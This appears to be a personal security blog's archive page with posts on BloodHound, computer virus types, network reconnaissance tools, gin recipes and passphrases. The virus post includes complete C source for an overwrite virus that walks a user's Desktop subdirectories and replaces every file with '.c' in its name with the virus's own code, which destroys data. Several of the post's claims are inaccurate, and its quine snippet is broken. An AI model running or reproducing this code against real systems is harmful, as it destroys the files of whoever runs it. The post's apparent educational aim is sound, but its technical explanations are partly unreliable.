[home] [about] [archive] [tags] [rss]
19 Dec 2020

Bloodhound writeup soon

Despite the ongoing Corona pandemic and the current lockdown situation, I finally get some time to do a major writeup on the tool bloodhound. Since this is going to be a long post, it will take quiet some weeks to finish I guess.

bloodhoundAD.png

Figure 1: https://bloodhound.readthedocs.io/en/latest/

For those who are not familiar with bloodhound yet, check it out on GitHub !

Tags: news update
17 Oct 2020

Virus

And I'm not talking about the Corona one here.

Definition

A computer virus is a type of malicious software program ("malware") that, when executed, replicates itself by modifying other computer programs and inserting its own code. Infected computer programs can include as well, data files, or the "boot" sector of the hard drive. When this replication succeeds, the affected areas are then said to be "infected" with a computer virus.

Macro Virus

A macro virus searches for other files with a specific file extension and then appends its own code to the file content. The most popular file extensions used by this type of viruses are:

  • .exe
  • .com
  • .bat
  • .cmd
  • .doc
  • .jar
  • .vbs

Overwrite Virus

Similar to a macro virus. The difference here is that the target file content will be deleted with source code of the virus.

Polymorph Virus

This sort of virus hides its presence by encrypting its own code. This process is structured into two parts:

  1. Virus decryption routine

    The code decrypts the encrypted virus body back to its original form, so the virus can perform activities.

  2. Virus encryption routine

    After performing activities the virus encrypts its body back to an unreadable form. The decryption routines stays the same. With this strategy the virus tries to avoid AV protection from operating systems.

Metamorphic Virus

Like the polymorph version, this type of virus changes its appearance. The difference here is that it uses a new encryption algorithm every time it starts the encryption routine.

Quine Virus

A virus that copies its source code to another file while using only one pointer. Normally a program needs two pointers (one source and one target pointer). These pointers are needed to copy data from source to target. More can be found here: Quine (computing)

Basic Overwrite Virus

This is some code written in the C programming language. This code example will try to change to /home/desktop and tries to scan the subdirectories. Every file in this directory and the first layer of subdirectories with a c* extension will be overwritten. Which in this case would infect files like .com , .cmd or .c. For the sake of clarity and debugging, error messages are implemented to follow the process. This code is designed with unix like operating systems in mind.

#include <stdio.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <pwd.h>

char pathToTargetFiles [1024];
char pathToLastOrigin [1024];
char arrayOfDirectorys[2048][1024];

void getSubDirectorys()
{
    int i = 0;
    DIR *dire;
    struct dirent *ent;

    if ((dire = opendir (pathToTargetFiles)) != NULL) 
    {
	while ((ent = readdir (dire)) != NULL) 
	{
	    char *isItADirectory = ent->d_name;

	    if(opendir(isItADirectory) && !(strstr(isItADirectory, "."))) 
	    {
		strcpy(arrayOfDirectorys[i], isItADirectory);
		i++;
	    }    
	}

	closedir (dire);
    }
    else 
    {
	perror ("Could not open recursive directory");
    }
}

//copy own source code to any c file in current directory
void infectFiles()
{
    int copyCodeToFile;
    FILE *fp1, *fp2;

    DIR *d;
    struct dirent *dir;
    d = opendir(".");

    if(d)
    {
	while((dir = readdir(d)) != NULL)
	{
	    char *currentFilePointer = dir->d_name;

	    //we look for all c files in current directory
	    if( strstr(currentFilePointer, ".c"))
	    {
		printf("We should open %s to write our code in it!\n", currentFilePointer);
		fp1 = fopen(pathToLastOrigin, "r");
		fp2 = fopen(currentFilePointer, "w");

		if(fp1 == NULL || fp2 == NULL)
		{
		    fclose(fp1);
		    fclose(fp2);
		    continue;
		}   
		else
		{
		    copyCodeToFile = fgetc(fp1);

		    while (copyCodeToFile != EOF)
		    {
			fputc(copyCodeToFile, fp2);
			copyCodeToFile = fgetc(fp1);
		    }

		    fclose(fp1);
		    fclose(fp2);
		}
	    }
	}
    }

    closedir(d);
}

//way to home dir
void pathTravaller()
{
    //getting user home directory
    struct passwd *pw = getpwuid(getuid());
    const char *homedir = pw->pw_dir;
    if(homedir == NULL)
	printf("Could not find home directory");

    strcpy(pathToTargetFiles, homedir);
    strcat(pathToTargetFiles, "/Desktop");

    //getting path to source code
    char cwd[1024];
    if (getcwd(cwd, sizeof(cwd)) == NULL)
	printf("Could not find current working directory");

    strcpy(pathToLastOrigin, cwd);
    char sourceFile [] = __FILE__;
    char addSlash [100] = "/";

    strcat(addSlash, sourceFile);
    strcat(pathToLastOrigin, addSlash);

    //finally change in the Desktop directory
    chdir(pathToTargetFiles);

    //getting first layer of subdirectorys
    getSubDirectorys();

    int z = 0;

    //change in every subdirectory and infect all c files
    while(!chdir(arrayOfDirectorys[z]))
    {
	printf("%d\n", z);
	printf("%s\n", arrayOfDirectorys[z]);
	infectFiles();
	chdir(pathToTargetFiles);
	z++;
    }
}

int main()
{
    pathTravaller();

    return 0;
}

Quine virus example

The following code snippets illustrates how a quine virus would work. As can be seen, this can be achieved via recursive loops.

int main()
{
    printf(int main() /n { /n printf(int main() /n { /n printf(int main ...
}

However this one would never end, thus only usable for example purposes.

As always, more usefull resources on this topic can be found on Wikipedia.

Tags: security virus code
19 Jun 2020

Footprints

Footprinting

Footprinting; often simply called recon (short for reconnaissance) is the uninteresting part for some people when it comes to attacking systems. Many want to start exploiting as soon as possible, if not looting. The pre-attack phase is crucial for a successful attack. As Mr. Bishop used to say in The Mechanic: "Amat Victoria Curam" - victory loves preparation.

What is essential for good reconing?

Much patience and above all thorough work! Now and then also a good portion of creativity. Often it takes quite a while to gather enough information about your target in the reconing phase. Sometimes small details are overlooked, that is why thorough work and exact analysis is extremely important.

Here are a few examples

  • Not all hosts in the network were scanned
  • Not all ports were scanned with nmap
  • UDP 1 ports were not scanned
  • Overlooking interesting hosts in large IP ranges

Passive or Active

There are two methods of footprinting. The passive and the active one. With the first method, information is collected without performing targeted scans against a system. For example, one can search through the targets website or for entries in the public WHOIS registry. This variant is essentially more stealthy, since no intrusion detection systems (IDS) are being triggered. The second method generates much more "noise" in the network and especially firewalls/IDS are not very happy if ping sweeps are performed. Therefore it is important to set up the used scanners in a way that they produce as little "noise" as possible. The lower the scan aggressiveness is set (e.g. T parameter in nmap) the "quieter" such scans can be performed. The disadvantage is that these scans take much more time than aggressive ones.

Sniffing

Can be very time consuming. But even here, important information such as host names, network size, subnets or domain controllers can be found out. For a neat overview and easy filtering I would recommend wireshark. If no GUI is available, you can alternatively use the wireshark-cli or tcpdump.

Toolset

Of course the right toolset always depends which target is being choosed. So if you were to attack a wireless network you would use the Aircrack-ng suite. For local networks both nmap and wireshark are actually indispensable.

A list of common tools as they can be found in Kali Linux

  • nmap
  • sparta
  • tcpdump
  • Bettercap2
  • arpspoof

Footnotes:

1

UDP scans take much longer and are less accurate, but open ports can still be found

Tags: security hacking
24 May 2020

Gin Recipies

There are different ways to drink and mix gin. Mixing ratios vary from 1:1 - 1:4 depending on taste. some combinations require ice cubes, others require gin at room temperature or a pre-cooled glass.

General preparation

  1. pour gin into a glass
  2. add tonic water. It is best to open the tonic bottle just before pouring, so that as little carbon dioxide is lost as possible.
  3. add ice cubes (optional)
  4. place fruits/herbs in the glass
  5. mix carefully with a cocktail stick or similar

ROKU Gin

This gin has a mild taste of cherry blossoms and fruits. Naturally berries or other fruits go best with it.

Soft Nashi

  • Gin: 4cl
  • Tonic: Fever Tree Elderflower
  • Fruits: Nashi quarter cut
  • Herbs: Thyme
  • Ice cubes: 2x
  • Ratio: 1:4

Fresh Lime

  • Gin: 4cl
  • Tonic: Schweppes Dry
  • Fruits: Lime + orange skin
  • Herbs: -
  • Ice cubes: 2x
  • Ratio: 1:3

Thomas Dakin

Dakin has a strong scent of citrus and lemon. It can be paired with Tonic waters like 1724 or the ones listed below.

The One

  • Gin: 5cl
  • Tonic: Fever Tree Classic
  • Fruits: Cucumber
  • Herbs:-
  • Ice cubes: 3x
  • Ratio: 1:3

Forest

  • Gin: 4cl
  • Tonic: Fentimans 19:05 Herbal Tonic Water
  • Fruits: -
  • Herbs: -
  • Ice cubes: 4x
  • Ratio: 1:4
Tags: fun
27 Apr 2019

Strong Passwords

Or how to not create weak ones

Most of the time people create passwords instead of passphrases in order to protect their accounts and/or sensible information. The following picture speaks for itself on how to do it the right way:

password_strength.jpg
Figure 1: https://xkcd.com/936/
Tags: security passwords
Other posts

This site belongs to Ioannis Gkourgkoutas and the content is published under CC BY-NC-SA 4.0 license.